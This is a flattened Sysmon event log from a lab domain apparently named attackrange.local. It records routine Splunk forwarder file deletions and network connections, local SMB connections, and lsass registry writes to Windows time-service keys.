07:57:08.905{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC79C63FF4D731024EAF3391B94CC965,SHA256=CEB23BECF144DF8BF13AA43222A3DE9E885D1B1A921CF88C4CFAFAB5188329E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104734Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:08.578{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE3E274BB2753B6604700DE704E66CFA,SHA256=E4F1DFEBA5CB9D9A8E546C71792C107F5312D0A12B64C783A07A8322554780F6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082581Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:05.693{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50104-false10.0.1.12-8000- 23542300x800000000000000082583Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:09.905{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB87C16BC580CC984E3FA298F0805E6B,SHA256=244FC188D3E7D96DBD07BBC7775CBBEF32E41B1A855CE4C1AE2A07BC5B4D63F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104735Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:09.594{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3729E8DB87FA35564DCDED86A01F7749,SHA256=21C5AE10B46B7626AB3FD114A82F9D13A42A13FA4B39BA22EE94B35557FC4350,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082584Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:10.905{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEC983AE18062FBFAE8E33D0B648B6E5,SHA256=BF4FC92CFE7808BD21D698F270CCBB91221339C43F4B607017B3B48A4809F34C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104736Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:10.625{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CBC890C6D944A16BFAD13E88E276781,SHA256=4E36A3A17280D0DC93D31178972DEF4CEC37BEEF23B4ECBBCC7987257590E6F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082585Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:11.905{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16B53E2A2CB1209E20B8B13DBE60EA46,SHA256=4B32DE7FA26BDAFF7166F4D6118B2B622C02AAE14135BCCB98C0C1CB4FFF12F2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104738Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:10.441{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51720-false10.0.1.12-8000- 23542300x8000000000000000104737Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:11.625{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B9AD6977D28E3D1307762AD09621EB7,SHA256=0B5B6E7115B99B92FA030BC68E35C599CAFCEC7F4528A54B776D6E6FE2DA6676,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104739Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:12.672{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1ACF88A117BB587BEF9F93396F5ECD19,SHA256=3F0C7E3D71D02B46E5DB41E08C6BDD0329A237A1E8CB425D34047526B78438DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082586Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:12.905{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E06D020F85168ED2A3410AF5D1D0C16,SHA256=5016A3AFD0D8720A15D6A0D75C7BA74FE444A3C2E34BEA167950629FC58D83DC,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082588Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:10.803{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50105-false10.0.1.12-8000- 23542300x800000000000000082587Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:13.905{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC1F001DA5B37C83ADF57362B44A938C,SHA256=69452F3610A89FB84BEF919518F05099456135B210CC84C06755E7C0D017E3D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104740Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:13.672{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7A3259BB19F2A2D0E4EAD409BF6595A,SHA256=1D898ED3F877D92C40F99F6AEBE51D1C0CD1FB82EB4FA13B31938EAF8B662A70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082589Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:14.905{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=368323F809889CCA90827F831401EA3C,SHA256=2329E2E1DA0EF6EF59BDF040035D5B28960A9B06E0410195B7A06F317CFE6735,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104741Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:14.688{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C787B4492B5F343FDF27877DA95B0B8B,SHA256=406BF3900CC19DC36C5FD0BC1B209F297A9711531DFA3E96C513A1100D3D9BAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104742Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:15.688{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30849F18BFAAC6DD0FCA66DD3A1782B8,SHA256=55398366EDA2AFD891D16BBC7A59EBEB5836208F7436E4860D1C8B3A0E01D11E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082590Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:15.905{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F25A293B2DF3C8D77E9496ADF35803DB,SHA256=679795CA6DC953617FA31D18BAC0C6980D348AD9E100C77FF4F3FE6D7D8AB585,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104743Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:16.717{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBECE59B85CF372B3B33C9F3223E7D43,SHA256=BE202A972770AFFEEA6653F5B8E5FFE170107463537BA4475D24E188E625E7B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082591Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:16.919{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5517BEAD9810B7D597E19E081D83AC8,SHA256=788A19D62FD4855517E93ABC50ADB558BBC36DF520D0589CE0B9140173705F3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082592Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:17.919{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B1DC764074A1237BCCF6468D186CBFE,SHA256=01732C7D1E35339E7A199A85F26CDEB4615557937BB66390A6ABCF2D0404E34A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104744Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:17.717{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15BC51C74DB07F1E3D786521D6D05025,SHA256=5C52480A6AB8EDB978F64D48E15CE2CB812D3A36782E74B4129BD1689CE55012,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082593Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:18.919{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D44FC70F82E49C2654D74A1A79F178B3,SHA256=A3D984CCB54F0C3C69422E1624D37C992F1D9E1DE9F787DB2DEB3C3F41160CD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104746Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:18.733{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB8424933E2BC8D854437CD60BAB07FB,SHA256=24A031221FC3337C538B87C943CA99168F80D7B9E2D0E7E2F0104176BF2A634E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104745Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:16.394{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51721-false10.0.1.12-8000- 23542300x8000000000000000104747Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:19.749{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D4472AED22E26E1269D2A800BC630AF,SHA256=15E3AA85481873BAEA641409DAD79637482664BB69446CB487D29502D042A975,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082595Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:19.919{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D24E61051A2C687F5A157D9CE3EE5F1,SHA256=4E7EEFCB191E02E084D00882B5F97E6D78EA53289961ADF50C7C366DFE4DDDAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082594Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:19.013{2FDD8D40-AC9A-615A-1200-00000000FD01}996NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=857EF36983BB02EFB17291B63DC30D24,SHA256=904974DF617245841B36D709855252747C0028DFFE64918872B843066CA4DA6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104748Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:20.764{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10A31F1CC57669027391B4A4DA6A11C8,SHA256=4EFBE270533DBF13E6C10F0D0C466E4263C1A3524B31B8EB47A3A3F7009FDE9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082597Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:20.919{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0409A23222D52B4647508756D61EDFAD,SHA256=76D7E7989BB7FBA83FFFA5FD0880F880874A2453747A323B7A261DE5074A9F51,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082596Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:16.769{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50106-false10.0.1.12-8000- 23542300x800000000000000082598Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:21.919{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=646E866AA15AC27C5F750194C52CCE69,SHA256=88EB48077F2FA7C4D90D5A0D670C9443B0766EAEA28FE6BCD554539CD1BF0031,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104751Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:21.780{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11AC9BBE915132D551A85F6A91FFAC31,SHA256=DD1D83DC8FF1EDF8EA6E8B42C90A3D2A2E5136A36FCD54C05A243A954223B0B7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104750Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:19.691{58E9C193-AC86-615A-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51722-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local445microsoft-ds 354300x8000000000000000104749Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:19.691{58E9C193-AC86-615A-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51722-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local445microsoft-ds 23542300x8000000000000000104752Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:22.795{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA84D654CD92B33D3FE5E8C271A53A60,SHA256=9F47D822E2377623491DD03673DEA792DB283FE32572911C422E61471F9E58B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082599Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:22.919{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83D03B1C6DDBE7B7FB98E03FD6B7B006,SHA256=942BF9C9918E8A0D56C49C4E933D464586A881CED73C0587BDACC9AB82864A90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104754Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:23.811{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1C80C8C2C253520DD8514597891BB98,SHA256=C07442743B735E19E4CEF2F11FABCE4F88999F51EA9B43273022DAF4CC5CFE64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082600Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:23.919{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7950948474BDD308E082A1BBBEB23871,SHA256=1440C1570416ACC9E67B443314100FB67ABFC524CF3709AE82E010AC3E590CE9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104753Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:21.424{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51723-false10.0.1.12-8000- 23542300x8000000000000000104755Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:24.827{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=448FB2D965F90039E4FCABA9C0F70B9F,SHA256=18B867BDD8385E087CEE06C35B85E64E346C05AC6E7321786AB2A365B694F13F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082602Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:24.919{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6548D40FB9A652AF7D86B6A2DA1CAC4B,SHA256=486C322B62D9756003F4721F686C8377B1296110C035591B6CE0DE75B64E1680,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082601Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:22.723{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50107-false10.0.1.12-8000- 23542300x8000000000000000104766Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:25.858{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B050ADCB51BA46000EDBBEFB4E964D31,SHA256=171F1FD1F722C68700FAB50DDCFCCFE9BC8417267C80483B1262543F777BCF67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082603Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:25.919{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=048E403ED8E4697B9795BE2C4FB865EE,SHA256=880FE61C0A494F87AF9991D648D733169D1ADD304063C80E30B2290BCB2246BF,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000104765Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:57:25.608{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000104764Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:57:25.608{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x001d1b6a) 13241300x8000000000000000104763Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:57:25.608{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b8ed-0x16768f55) 13241300x8000000000000000104762Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:57:25.608{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b8f5-0x783af755) 13241300x8000000000000000104761Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:57:25.608{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b8fd-0xd9ff5f55) 13241300x8000000000000000104760Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:57:25.608{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000104759Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:57:25.608{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x001d1b6a) 13241300x8000000000000000104758Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:57:25.608{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b8ed-0x16768f55) 13241300x8000000000000000104757Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:57:25.608{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b8f5-0x783af755) 13241300x8000000000000000104756Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:57:25.608{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b8fd-0xd9ff5f55) 23542300x8000000000000000104767Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:26.858{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58AF2F74AEC1DC53F9EE0BABFDF48A9D,SHA256=938EB84ED74A2218F28BA12737C25660047C6085249EBE92BA827121E50A9D5E,IMPHASH=00000000000000000000000000000000falsetrue 